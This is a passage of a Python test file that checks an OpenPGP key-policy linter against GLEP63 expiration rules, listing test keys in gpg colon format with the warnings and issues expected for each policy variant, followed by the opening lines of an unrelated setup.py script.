key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 4),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 4),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
}
class PrimaryKeyFiveYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-5y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1690927205::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247205::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 5),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 5),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class PrimaryKeySixYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-6y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1722463206::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247206::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1564783201:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1564783201:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 6),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 6),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyNoExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-noexpire.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201::::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201::::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:none',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:none',
long_desc='',
),
],
}
class SubKeySixYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-6y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1722463208:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1722463208:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 8),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2024, 7, 31, 22, 0, 8),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyFiveYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-5y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1690927209:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1690927209:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 9),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2023, 8, 1, 22, 0, 9),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:long',
long_desc='',
),
],
}
class SubKeyTwoYearExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-2y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1596319210:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1596319210:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 10),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2020, 8, 1, 22, 0, 10),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:long',
long_desc='',
),
],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
class SubKeyOneWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-1w.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1533852011:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1533852011:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyIssue(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
class TwoSubKeysExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/two-subkeys-1w-1y.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247207::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:3F911DBFC4B51F74:1533247201:1533852011:::::s::::::23:
fpr:::::::::26BF2B75CB42D5803C615AF43F911DBFC4B51F74:
sub:-:4096:1:44C9C2CFA6974493:1533247201:1533852011:::::e::::::23:
fpr:::::::::CF8439AF79B439E0D9D7C99B44C9C2CFA6974493:
sub:-:4096:1:88580872B51C08B9:1533247212:1564783212:::::s::::::23:
fpr:::::::::3D36B68F75BA09167B32CF0C88580872B51C08B9:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::e::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='3F911DBFC4B51F74',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='44C9C2CFA6974493',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=datetime.datetime(2018, 8, 9, 22, 0, 11),
key_caps='e',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='88580872B51C08B9',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 7),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
class PrimaryKeyThreeWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/primary-3w.gpg'
GPG_COLONS = '''
tru::1:1533247200:1564783200:3:1:5
pub:-:4096:1:0C03DAC68D7CAAA4:1533247200:1535061601::u:::cESC::::::23::0:
fpr:::::::::2CBB31F7106077B10497E2180C03DAC68D7CAAA4:
uid:-::::1533247201::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:B600D9C92333A0BD:1533247200:1564783200:::::s::::::23:
fpr:::::::::80DE955635C6D9BF397182E0B600D9C92333A0BD:
sub:-:4096:1:5C86C94E1054CF0D:1533247200:1564783200:::::e::::::23:
fpr:::::::::5CB0AB96CC27B81BC863A49A5C86C94E1054CF0D:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0C03DAC68D7CAAA4',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='B600D9C92333A0BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='5C86C94E1054CF0D',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 1),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
KeyWarning(
key=KEY,
machine_desc='expire:short',
long_desc='',
),
],
}
class SubKeyThreeWeekExpirationTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'expiration/subkey-3w.gpg'
GPG_COLONS = '''
tru::1:1533247200:1564783200:3:1:5
pub:-:4096:1:0C03DAC68D7CAAA4:1533247200:1564783200::u:::cESC::::::23::0:
fpr:::::::::2CBB31F7106077B10497E2180C03DAC68D7CAAA4:
uid:-::::1533247200::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <[email protected]>::::::::::0:
sub:-:4096:1:B600D9C92333A0BD:1533247200:1535061601:::::s::::::23:
fpr:::::::::80DE955635C6D9BF397182E0B600D9C92333A0BD:
sub:-:4096:1:5C86C94E1054CF0D:1533247200:1535061601:::::e::::::23:
fpr:::::::::5CB0AB96CC27B81BC863A49A5C86C94E1054CF0D:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0C03DAC68D7CAAA4',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='B600D9C92333A0BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='5C86C94E1054CF0D',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2018, 8, 23, 22, 0, 1),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <[email protected]>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='expire:short',
long_desc='',
),
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[1],
machine_desc='expire:short',
long_desc='',
),
],
}
|
py | 1a37f1835eb0baa10aa3188d7a8848fc1d91510f | import setuptools
with open('README.md', 'r') as fh:
long_description = fh.read()
setuptools.setup(
